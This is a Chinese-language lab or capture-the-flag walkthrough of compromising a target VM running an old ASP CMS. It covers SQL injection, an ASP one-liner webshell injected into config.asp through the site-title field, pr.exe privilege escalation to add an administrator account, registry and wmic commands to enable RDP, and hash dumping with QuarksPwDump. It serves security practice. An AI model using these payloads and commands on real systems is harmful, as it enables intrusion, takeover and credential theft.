实验工具: 中国菜刀 Pr 御剑 Pangolin 3389
0x01
拿到靶机环境,根据工具猜想,存在SQL注入漏洞
先用工具扫描一下,打开明小子
工具:旁注WEB综合检测程序Ver3.6修正版
路径:C:\Tools\注入工具\Domain3.6\Domain3.6.exe
sql注入检测一下,顺利爆出管理员用户名和密码
拿去解密一下拿到明文
工具:MD5Cracksp
路径:C:\Tools\破解工具\MD5
0x02
拿到管理员密码登录后台,盲猜后台地址/admin,盲猜成功,嘻嘻嘻
根据提示需要获取webshell,浏览一下管理员界面
找了一会感觉产品图片可能会有利用,然后做了个图片马,结果发现没有上传入口-.-||
找了半天也没发现别的上传入口,实在不行了。看看题解,原来如此简单
配置网站标题,插入一句话木马:
具体实现方式为:
解释一下一句话木马
/inc/config.asp的源码是这样的:
<%
Const SiteName=”魅力企业网站管理系统 2007 中英繁商业正式版” ‘网站名称
Const EnSiteName=”MSCOM 2007″ ‘网站名称
Const SiteTitle=”魅力软件” ‘网站标题
Const EnSiteTitle=”MelyySoft” ‘网站标题
Const SiteUrl=”www.melyysoft.com” ‘网站地址
Const Miibeian=”湘ICP备05011184号” ‘网站备案号
….
%>
构造一句话木马:
“%><%Eval Request(Chr(35))%><%’
插入一句话木马后,config.asp代码会变成这样:
<%
Const SiteName=””%><%Eval Request(Chr(35))%><% ‘” ‘网站名称
Const EnSiteName=”MSCOM 2007″ ‘网站名称
Const SiteTitle=”魅力软件” ‘网站标题
Const EnSiteTitle=”MelyySoft” ‘网站标题
Const SiteUrl=”www.melyysoft.com” ‘网站地址
Const Miibeian=”湘ICP备05011184号” ‘网站备案号
….
%>
上菜刀,成功进入
配置文件路径就是shell路径,刚才在修改网站信息的时候配置文件路径可以看见
0x03
想要知道管理员密码有很多工具,但是现在写需要权限运行,所以,要提权
嘻嘻嘻,拒绝访问
那就自己上传点好东西
打开虚拟终端切换至目标目录,用pr.exe执行cmd命令,添加账户;
pr “net user qwer 123 /add”,添加成功
提权:
pr “net localgroup administrators qwer /add” 成功提权
然后打开3389端口远程连接
打开3389端口的方式有两种
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
wmic RDTOGGLE WHERE ServerName=
'%COMPUTERNAME%'
call SetAllowTSConnections 1
这里把第一条命令写成bat文件,上传后用pr执行一下,执行成功
0x04
远程桌面连接之后,下一步要获取管理员口令
上传工具getpass,结果只能爆出当前登录管理员口令,虽然是明文的。。。
再试试QuarksPwDump,成功
QuarksPwDump –dump-hash-local
解密一下拿到flag
参考博文:开启 3389 的 cmd 命令